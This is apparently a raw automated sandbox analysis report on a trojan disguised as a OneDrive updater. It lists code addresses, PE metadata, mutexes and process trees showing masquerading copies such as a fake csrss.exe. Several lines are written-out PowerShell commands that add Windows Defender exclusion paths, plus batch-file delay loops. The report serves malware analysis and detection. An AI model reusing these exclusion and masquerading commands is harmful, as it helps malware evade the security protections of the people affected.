Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC488E70	46_2_00007FFAAC488E70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC48C350	46_2_00007FFAAC48C350
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC48C425	46_2_00007FFAAC48C425
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC488028	46_2_00007FFAAC488028
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC4948EE	46_2_00007FFAAC4948EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC488E7F	46_2_00007FFAAC488E7F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC4893A1	46_2_00007FFAAC4893A1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC5FC27D	46_2_00007FFAAC5FC27D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 46_2_00007FFAAC5F5FB9	46_2_00007FFAAC5F5FB9
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC471222	51_2_00007FFAAC471222
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC478E70	51_2_00007FFAAC478E70
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC47C350	51_2_00007FFAAC47C350
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC478028	51_2_00007FFAAC478028
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC47C425	51_2_00007FFAAC47C425
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC4848EE	51_2_00007FFAAC4848EE
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC478E7F	51_2_00007FFAAC478E7F
Source: C:\Users\Public\Documents\csrss.exe	Code function: 51_2_00007FFAAC5EC27D	51_2_00007FFAAC5EC27D
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC48C350	56_2_00007FFAAC48C350
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC48C425	56_2_00007FFAAC48C425
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC481222	56_2_00007FFAAC481222
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC488028	56_2_00007FFAAC488028
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC488E7F	56_2_00007FFAAC488E7F
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC4893A1	56_2_00007FFAAC4893A1
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Code function: 56_2_00007FFAAC5FC27D	56_2_00007FFAAC5FC27D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC451222	63_2_00007FFAAC451222
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC458E70	63_2_00007FFAAC458E70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC45C350	63_2_00007FFAAC45C350
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC458028	63_2_00007FFAAC458028
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC45C425	63_2_00007FFAAC45C425
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC4648EE	63_2_00007FFAAC4648EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC458E7F	63_2_00007FFAAC458E7F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Code function: 63_2_00007FFAAC5CC27D	63_2_00007FFAAC5CC27D
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC48C350	67_2_00007FFAAC48C350
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC4EE310	67_2_00007FFAAC4EE310
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC48E000	67_2_00007FFAAC48E000
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC481222	67_2_00007FFAAC481222
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC488028	67_2_00007FFAAC488028
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC488E7F	67_2_00007FFAAC488E7F
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC4893A1	67_2_00007FFAAC4893A1
Source: C:\Users\Public\Documents\csrss.exe	Code function: 67_2_00007FFAAC5FC27D	67_2_00007FFAAC5FC27D

Source: vcUYBlwU.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: APmXeiLI.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pbHguWQZ.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: hyzrKdBs.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PlXlrHgd.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: AVoOdXhS.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WoNdSLwd.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LAjmiABv.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BSPWzXwN.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZXUBvZWR.log.32.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XVEvJLRT.log.41.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: OnkfajLl.log.41.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vaJZGNqW.log.41.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: tYWrkemb.log.41.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ocVadywh.log.41.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pzyaVZFL.log.46.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: lJHjOcES.log.46.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: caoTeAzl.log.46.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: SrUDuXuD.log.46.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: rBkIrIJH.log.46.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dVzTSQDZ.log.51.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vqLrRVyt.log.51.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: QEZfGaYD.log.51.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GVFPWxSW.log.51.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wnmzmVNo.log.51.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LpAoDpdA.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IzKxwscH.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pniscWHs.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: hJaCsdsL.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NsnWYYhw.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: lYJBZlMp.log.63.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HsjPOZbA.log.63.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: xJPzewWS.log.63.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: fxnuLaBD.log.63.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UJJDbPGV.log.63.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: JDsxUuzs.log.67.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GKdPiyNu.log.67.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ntqjPtDe.log.67.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WmaEvGYQ.log.67.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: CUnYbBNA.log.67.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: OneDriveStandaloneUpdater.exe, 00000000.00000000.1247832726.00000000002D2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs OneDriveStandaloneUpdater.exe
Source: OneDriveStandaloneUpdater.exe, 00000000.00000002.1316360942.0000000000A62000.00000002.00000001.01000000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs OneDriveStandaloneUpdater.exe
Source: OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002961000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs OneDriveStandaloneUpdater.exe
Source: OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002977000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs OneDriveStandaloneUpdater.exe
Source: OneDriveStandaloneUpdater.exe, 00000038.00000002.1973690017.0000000002846000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs OneDriveStandaloneUpdater.exe
Source: OneDriveStandaloneUpdater.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs OneDriveStandaloneUpdater.exe

Source: OneDriveStandaloneUpdater.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@110/127@15/0

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File created: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe

Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File created: C:\Users\user\Desktop\vcUYBlwU.log

Jump to behavior

Source: C:\Users\Public\Documents\csrss.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Users\Public\Documents\csrss.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-RZ2CPLiApiJRJuXbfSyz
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3960:120:WilError_03

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File created: C:\Users\user\AppData\Local\Temp\f4wp5ulp

Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hHF9v8Y4oh.bat"

Source: OneDriveStandaloneUpdater.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: OneDriveStandaloneUpdater.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OneDriveStandaloneUpdater.exe	Virustotal: Detection: 63%
Source: OneDriveStandaloneUpdater.exe	ReversingLabs: Detection: 76%

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

File read: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1C5B.tmp" "c:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe'
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\MjlsqDcSPlv.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\MjlsqDcSPlv.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\MjlsqDcSPlv.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hHF9v8Y4oh.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe "C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: unknown	Process created: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
Source: unknown	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe "C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
